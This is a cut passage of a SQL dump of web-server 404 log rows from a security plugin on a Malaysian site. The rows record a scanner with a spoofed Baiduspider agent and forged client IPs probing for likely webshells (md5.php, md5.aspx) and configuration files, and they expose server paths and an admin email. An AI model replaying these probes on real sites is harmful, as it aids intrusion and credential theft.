14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6XeKyUrY9zjNB4MheuSAAAAZU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674552.6108\";s:12:\"REQUEST_TIME\";s:10:\"1570674552\";}}','notice','2019-10-10 02:29:14','2019-10-10 02:29:13',35051448,36857664,'https://bintara.com.my/data/cache/t.php',1,0,'54.138.89.209'),(27809,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/dxyylc/md5.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"67.251.221.102\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=330fd2a88ea396ebfa6c92b0fa3699b8\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"67.251.221.102\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/dxyylc/md5.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/dxyylc/md5.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XYuBT1onqG4TOWhlE@gAAAQQ\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/dxyylc/md5.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/dxyylc/md5.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XYuBT1onqG4TOWhlE@gAAAQQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/dxyylc/md5.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/dxyylc/md5.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6XYuBT1onqG4TOWhlE@gAAAQQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"53369\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/dxyylc/md5.php\";s:10:\"SCRIPT_URL\";s:15:\"/dxyylc/md5.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6XYuBT1onqG4TOWhlE@gAAAQQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674530.2705\";s:12:\"REQUEST_TIME\";s:10:\"1570674530\";}}','notice','2019-10-10 02:28:53','2019-10-10 02:28:50',35045064,36852688,'https://bintara.com.my/dxyylc/md5.php',1,0,'67.251.221.102'),(27808,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//dxyylc/md5.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"432\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"245.246.131.149\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"245.246.131.149\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/dxyylc/md5.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/dxyylc/md5.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6XUhypZvX7@gJ12mO-dAAAAJM\";s:12:\"REDIRECT_URL\";s:16:\"/dxyylc/md5.aspx\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"52744\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/dxyylc/md5.aspx\";s:10:\"SCRIPT_URL\";s:16:\"/dxyylc/md5.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6XUhypZvX7@gJ12mO-dAAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570674514.845\";s:12:\"REQUEST_TIME\";s:10:\"1570674514\";}}','notice','2019-10-10 02:28:37','2019-10-10 02:28:35',35831728,37630592,'http://bintara.com.my//dxyylc/md5.aspx',1,0,'183.158.132.12'),(27807,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/data/data/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"241.169.21.99\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=40b1972034c27ca01095f83875e4155d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"241.169.21.99\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/data/data/\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/data/data/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6XTH6YXSDJF91Gv2PyGwAAABI\";s:12:\"REDIRECT_URL\";s:11:\"/data/data/\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"52607\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/data/data/\";s:10:\"SCRIPT_URL\";s:11:\"/data/data/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6XTH6YXSDJF91Gv2PyGwAAABI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674508.2776\";s:12:\"REQUEST_TIME\";s:10:\"1570674508\";}}','notice','2019-10-10 02:28:30','2019-10-10 02:28:28',35043104,36847168,'https://bintara.com.my/data/data/',1,0,'183.158.132.12'),(27806,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:65:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/data/conn/config.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"203.174.165.20\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=4b5a922076c92bba2132976276e17bc7\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"203.174.165.20\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/data/conn/config.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/data/conn/config.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XQhypZvX7@gJ12mO-cAAAAI8\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/data/conn/config.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/data/conn/config.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XQhypZvX7@gJ12mO-cAAAAI8\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/data/conn/config.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/data/conn/config.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XQhypZvX7@gJ12mO-cAAAAI8\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/data/conn/config.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/data/conn/config.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6XQhypZvX7@gJ12mO-cAAAAI8\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"52292\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/data/conn/config.php\";s:10:\"SCRIPT_URL\";s:21:\"/data/conn/config.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6XQhypZvX7@gJ12mO-cAAAAI8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674498.3997\";s:12:\"REQUEST_TIME\";s:10:\"1570674498\";}}','notice','2019-10-10 02:28:20','2019-10-10 02:28:18',35060744,36863856,'https://bintara.com.my/data/conn/config.php',1,0,'203.174.165.20'),(27805,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/data/config.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"154.207.195.167\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=2f5bf632fca84eb3be40d11c4629a99f\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"154.207.195.167\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/data/config.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/data/config.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XOH6YXSDJF91Gv2PyGAAAAAY\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/data/config.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/data/config.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XOH6YXSDJF91Gv2PyGAAAAAY\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/data/config.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/data/config.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6XOH6YXSDJF91Gv2PyGAAAAAY\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"51958\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/data/config.php\";s:10:\"SCRIPT_URL\";s:16:\"/data/config.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6XOH6YXSDJF91Gv2PyGAAAAAY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674488.2554\";s:12:\"REQUEST_TIME\";s:10:\"1570674488\";}}','notice','2019-10-10 02:28:10','2019-10-10 02:28:08',35041056,36842368,'https://bintara.com.my/data/config.php',1,0,'154.207.195.167'),(27804,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/book/story_dod_hjkdsafon.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"89.143.49.112\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=dd13ace83cf15a6377bbe12e580c8797\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"89.143.49.112\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/book/story_dod_hjkdsafon.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:29:\"/book/story_dod_hjkdsafon.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XKOBT1onqG4TOWhlEzwAAAQ8\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/book/story_dod_hjkdsafon.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:29:\"/book/story_dod_hjkdsafon.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XKOBT1onqG4TOWhlEzwAAAQ8\";s:19:\"REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/book/story_dod_hjkdsafon.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:29:\"/book/story_dod_hjkdsafon.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6XKOBT1onqG4TOWhlEzwAAAQ8\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"51382\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:51:\"https://bintara.com.my/book/story_dod_hjkdsafon.php\";s:10:\"SCRIPT_URL\";s:29:\"/book/story_dod_hjkdsafon.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6XKOBT1onqG4TOWhlEzwAAAQ8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674472.1131\";s:12:\"REQUEST_TIME\";s:10:\"1570674472\";}}','notice','2019-10-10 02:27:53','2019-10-10 02:27:52',35052376,36853128,'https://bintara.com.my/book/story_dod_hjkdsafon.php',1,0,'89.143.49.112'),(27803,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:77:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"134.212.220.32\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=d5f8888990def437c6c19c05194dc0b6\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; 